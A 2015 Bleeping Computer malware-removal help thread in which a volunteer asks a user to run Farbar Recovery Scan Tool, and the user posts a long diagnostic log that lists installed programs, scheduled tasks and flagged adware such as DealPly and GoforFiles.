Multiple conhost exe and computer is moving very slow


  • This topic is locked
35 replies to this topic

#1 dwayne12

dwayne12

  • Members
  • 19 posts
  • OFFLINE
  • Local time:12:15 AM

Posted 28 June 2015 - 08:51 AM

My computer is going really slow and I don't know what to do. It has multiple conhost exe up and I can't figure it out. I downloaded Malwarebytes Anti-Malware and it's detecting a lot of trojan clicker.





#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 09:24 AM

Hi & welcome to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1

Please run a FRST scan. This will help us diagnose your problem.

Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#3 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  • Local time:12:15 AM

Posted 28 June 2015 - 10:41 AM

Additional scan result of Farbar Recovery Scan Tool (x64) Version:28-06-2015
Ran by User at 2015-06-28 11:39:45
Running from C:\Users\User\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1557550123-2840590655-2789666575-500 - Administrator - Disabled)
Guest (S-1-5-21-1557550123-2840590655-2789666575-501 - Limited - Disabled)
UpdatusUser (S-1-5-21-1557550123-2840590655-2789666575-1006 - Limited - Enabled) => C:\Users\UpdatusUser
User (S-1-5-21-1557550123-2840590655-2789666575-1000 - Administrator - Enabled) => C:\Users\User

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Ad-Aware Antivirus (Disabled - Out of date) {D87B6541-12A1-DAEA-0033-9B8057AAB996}
AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Ad-Aware Antivirus (Disabled - Out of date) {631A84A5-349B-D564-3A83-A0F22C2DF32B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}
FW: Ad-Aware Firewall (Disabled) {E040E464-58CE-DBB2-2B6C-32B5A979FEED}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

AdAwareInstaller (HKLM\...\{BB6E5AA0-BBE9-4009-B94E-2801F2D67DD7}) (Version:  - )
Adobe Flash Player 17 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.8.158 - Adobe Systems, Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Application Verifier x64 External Package (Version: 8.59.29722 - Microsoft) Hidden
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6037 - AVG Technologies)
AVG 2015 (Version: 15.0.4365 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.6037 - AVG Technologies) Hidden
DealPly (HKU\.DEFAULT\...\DealPly) (Version:  - )
DealPly (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Dealply) (Version:  - )
DealPly (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dealply) (Version:  - )
DFO (HKLM-x32\...\{C1E5C0FB-527E-42C6-BCA0-0A37A6124AE4}) (Version: 1.01.0000 - Neople)
EPSON Artisan 830 Series Printer Uninstall (HKLM\...\EPSON Artisan 830 Series) (Version:  - SEIKO EPSON Corporation)
GoforFiles (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\GoforFiles) (Version: 1.9.5 - http://www.goforfiles.com/) <==== ATTENTION
GoforFiles (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\GoforFiles) (Version: 1.9.5 - http://www.goforfiles.com/) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.130 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.27.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Kits Configuration Installer (x32 Version: 8.59.25584 - Microsoft) Hidden
Malwarebytes Anti-Malware version 2.1.6.1022 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.6.1022 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM-x32\...\{4AE57014-05C4-4864-A13D-86517A7E1BA4}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft Expression Encoder 4 (HKLM-x32\...\Encoder_4.0.3205.0) (Version: 4.0.3205.0 - Microsoft Corporation)
Microsoft Expression Encoder 4 Screen Capture Codec (HKLM-x32\...\{F9EC30D1-F688-4708-9850-CB5120074AAA}) (Version: 4.0.3205.0 - Microsoft Corporation)
Microsoft IntelliPoint 8.1 (HKLM\...\Microsoft IntelliPoint 8.1) (Version: 8.15.406.0 - Microsoft)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 38.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 38.0.5 (x86 en-US)) (Version: 38.0.5 - Mozilla)
Nosgoth (HKLM-x32\...\Steam App 200110) (Version: 150516.109666 - Square Enix Ltd)
NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.5.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.5.44 - NVIDIA Corporation)
NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
SDK Debuggers (x32 Version: 8.59.29746 - Microsoft Corporation) Hidden
Search Protect (HKLM-x32\...\SearchProtect) (Version: 2.21.20.22 - Client Connect LTD)
SHIELD Streaming (Version: 4.1.2000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.5.44 - NVIDIA Corporation) Hidden
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version:  - )
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Unity Web Player (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Software Development Kit (HKLM-x32\...\{363a2c1e-637f-45ce-933b-5a5463efd945}) (Version: 8.59.29750 - Microsoft Corporation)
WPT Redistributables (x32 Version: 8.59.29750 - Microsoft) Hidden
WPTx64 (x32 Version: 8.59.29722 - Microsoft) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\cnvfat.dll No File <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\cnvfat.dll No File <==== ATTENTION

==================== Restore Points =========================

25-06-2015 15:50:04 Removed BlueStacks Notification Center
28-06-2015 08:26:58 Restore Operation
28-06-2015 08:49:04 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
28-06-2015 08:53:57 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
28-06-2015 08:55:49 Removed Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
28-06-2015 08:57:17 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
28-06-2015 08:59:02 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
28-06-2015 09:01:41 Removed Visual Studio 2012 x64 Redistributables
28-06-2015 09:03:13 Removed Visual Studio 2008 x64 Redistributables
28-06-2015 09:05:57 Removed Visual Studio 2010 x64 Redistributables
28-06-2015 09:09:44 Removed Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
28-06-2015 09:12:06 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 제거
28-06-2015 09:13:23 Removed Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
28-06-2015 09:16:08 Removed Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
28-06-2015 09:27:32 Revo Uninstaller's restore point - Java 8 Update 45
28-06-2015 09:28:15 Removed Java 8 Update 45
28-06-2015 09:55:19 Revo Uninstaller's restore point - Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
28-06-2015 09:56:00 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2012-03-10 14:47 - 00000098 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1       localhost

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {009FF62F-3E2F-414D-84DB-4D9CEA4E3034} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask No Task File <==== ATTENTION
Task: {01C2294D-7EF1-466D-8438-CE409D987BBF} - System32\Tasks\SidebarExecute => C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {01C81EE9-52C4-4B5A-899A-8E12D307BE1E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {074D46DD-4A48-4197-82F8-E1ABCE6BA0E5} - System32\Tasks\RunOW => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe
Task: {14051FE1-3239-4F67-B79C-4D8F2A26AB3A} - System32\Tasks\{B9DAF0CE-8515-450F-AE60-24DFF1D98B1C} => pcalua.exe -a "C:\Program Files (x86)\Hi-Rez Studios\HiRezGamesDiagAndSupport.exe" -c uninstall=17
Task: {1DA4EA4B-4005-49FA-9AA1-E25C1EC56007} - System32\Tasks\{6A179C48-A0CF-4176-B2C5-6836E8A4C021} => pcalua.exe -a C:\Users\User\Downloads\dxwebsetup(1).exe -d C:\Users\User\Downloads
Task: {2EF3534B-23C1-4499-A4FE-284423208781} - System32\Tasks\{51E19296-C6F1-4D66-8031-3514E0E5DE52} => pcalua.exe -a "C:\Users\User\Desktop\OpenOffice.org 3.4.1 (en-US) Installation Files\setup.exe" -d "C:\Users\User\Desktop\OpenOffice.org 3.4.1 (en-US) Installation Files"
Task: {3D5D08CD-F268-496D-B49E-57892606D21A} - System32\Tasks\Dealply => C:\Users\User\AppData\Roaming\DealPly\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {41EE5F89-3B6F-4ED9-BB51-A9AC0B0C337C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {4D9E6DC7-B410-44CD-9036-3151471981B6} - System32\Tasks\{1E0E0D6C-0EEA-496B-BB4C-F56478BDA9C1} => pcalua.exe -a D:\install.exe -d D:\
Task: {5005B1E9-7F1F-46A0-AC23-95377E8F38F0} - System32\Tasks\{46A4EBC4-B299-4000-AA06-11085B610AF2} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{3E31400D-274E-4647-916C-2CACC3741799}\ENPSETUP.exe" -c -runfromtemp -l0x0009 -EPSON -removeonly
Task: {621416A3-CC83-4E96-81E9-88CDE8EA9632} - System32\Tasks\GoforFilesUpdate => C:\Program Files (x86)\GoforFiles\GFFUpdater.exe [2013-10-13] (http://goforfiles.com/) <==== ATTENTION
Task: {65EB9E56-B589-4D5C-9E71-2D82F1496EC6} - System32\Tasks\MySearchDial => C:\Users\User\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {68F2BF8C-D8CF-4DD3-955F-EC0499553836} - System32\Tasks\{EFDEAD54-5971-441F-844B-9AF27FA787B3} => pcalua.exe -a D:\INSTALL.EXE -d D:\
Task: {6971DD55-32E9-4D80-858C-30EF50A7AF4B} - System32\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {7439732B-D1E3-45BE-8361-B2A2BC147DA8} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000UA => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23] (Facebook Inc.)
Task: {83862B30-A3BB-46C8-B8A2-EECBB4BB32A5} - System32\Tasks\{1D160B88-B2D1-4015-8E02-A08A8C082F4C} => pcalua.exe -a C:\Users\User\Downloads\dxwebsetup(2).exe -d C:\Users\User\Downloads
Task: {8920B9D6-4C2F-4ECD-8C17-EC824CC2947A} - System32\Tasks\AdobeAAMUpdater-1.0-User-PC-User => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2014-02-27] (Adobe Systems Incorporated)
Task: {93536470-D3DA-4118-B359-D2B3C4A2FD27} - System32\Tasks\DealPlyUpdate => C:\Program Files (x86)\DealPly\DealPlyUpdate.exe <==== ATTENTION
Task: {994E32EC-8DFF-435C-825C-556C95600FBD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-06-04] (Adobe Systems Incorporated)
Task: {A9E1D394-2B68-44EE-8A02-6C9C80FBCDA5} - System32\Tasks\{4F2D8C26-227F-4095-BB25-E378165C2FD6} => pcalua.exe -a D:\PLAYD2.EXE -d D:\
Task: {B25342B6-B3D8-4E2D-B6E8-B46FECD99A2C} - System32\Tasks\ASUS\ASUS SIX Engine => C:\Program Files (x86)\ASUS\EPU-4 Engine\FourEngine.exe [2009-08-20] (ASUSTeK Computer Inc.)
Task: {B2E32647-C74B-4E58-95EE-5502AC559F45} - \BackgroundContainer Startup Task No Task File <==== ATTENTION
Task: {B50BED07-A5AF-4383-90C3-5BD38D5BDFF4} - System32\Tasks\{3C4A07D5-FD7E-4BFA-AC2B-4807D8053A90} => pcalua.exe -a "C:\Program Files\DomaIQ Uninstaller\DomaIQUninstall.exe"
Task: {B962029A-CD2A-4871-8D8A-B3B4AF2A389B} - System32\Tasks\{824DFE1B-C7A9-488E-953B-72581D210227} => pcalua.exe -a "D:\Adobe Pagemaker 7.0 with Serial.exe" -d D:\
Task: {BB503B1F-AA8F-408B-82BB-8C6D1E0038FD} - System32\Tasks\ParetoLogic Update Version3 => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe
Task: {BE0DFCB3-37FF-4FE3-B59B-57FAB045EF21} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000Core => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23] (Facebook Inc.)
Task: {C44251DE-CB33-4E58-A151-0910481AD9EE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {C46332B6-7F21-4B3E-8A65-C1E717E097E4} - System32\Tasks\ybzhzak => C:\Users\User\AppData\Local\Temp\rtjefok.exe <==== ATTENTION
Task: {C61E2429-F942-4739-9A45-46129394E0B3} - System32\Tasks\{503C0D29-248F-4AFF-8718-A3F95D837274} => pcalua.exe -a D:\WBR2310.exe -d D:\
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector No Task File <==== ATTENTION
Task: {D4A51E57-DF4A-47EF-818E-F86679C5E970} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline No Task File <==== ATTENTION
Task: {E035411D-BE4E-4150-B486-0CA0813EBDED} - System32\Tasks\{FB038026-8BB4-48D0-871A-184689A7BBB1} => pcalua.exe -a C:\Users\User\Downloads\FTU_V32_5_10_00_5092.exe -d C:\Users\User\Downloads
Task: {E14A0A14-95A0-4510-A52F-7B3136B23DB5} - System32\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {E6F8F56B-D2C7-4214-AA95-5F95475B66A9} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2011-04-13] (Microsoft Corporation)
Task: {EB4EE7CD-8D99-44E4-9E27-DAEECF2299B0} - System32\Tasks\{E3699AD5-9121-4915-B1BF-7E214006BF62} => pcalua.exe -a C:\Users\User\Downloads\FastTrackPro_6_0_2_5_10_0_5134.exe -d C:\Users\User\Downloads
Task: {EEE21153-7A10-4314-A668-F0FEAF775FF0} - System32\Tasks\{DCD4A4B9-A95D-45FA-A73D-47AE8B493E65} => pcalua.exe -a E:\SETUP.EXE -d E:\
Task: {F5E008B8-9BD7-4D6C-A61A-E0FE43C6997B} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{E1E12980-9D68-4D19-B185-76EF4D1D3E7E}.exe
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector No Task File <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{E1E12980-9D68-4D19-B185-76EF4D1D3E7E}.exe <==== ATTENTION
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000Core.job => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000UA.job => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\MySearchDial.job => C:\Users\User\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION

==================== Loaded Modules (Whitelisted) ==============

2014-12-24 18:20 - 2014-07-02 14:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-06-03 15:47 - 2014-06-03 15:47 - 00706864 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe
2014-06-03 16:19 - 2014-06-03 16:19 - 00103800 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_thread-vc100-mt-1_55.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00024440 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_system-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00033656 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_chrono-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00055680 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_date_time-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00123776 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_filesystem-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 10070888 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareServiceKernel.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00685904 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\SQLite.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 03393352 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\RCF.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00788856 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_regex-vc100-mt-1_55.dll
2014-06-03 16:17 - 2014-06-03 16:17 - 00604520 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareActivation.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00158032 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\pugixml.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00360312 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareApplicationUpdater.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00149840 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\libssh2.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00106824 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\zlib.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00142696 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareGamingMode.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00098648 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareReset.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00120152 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTime.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00290168 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareDefinitionsUpdater.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00198024 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareDefinitionsUpdaterScheduler.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00417128 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareIgnoreList.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00245608 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareQuarantine.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00336752 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiMalwareEngine.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00212336 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiRootkitEngine.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00509808 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareScannerHistory.dll
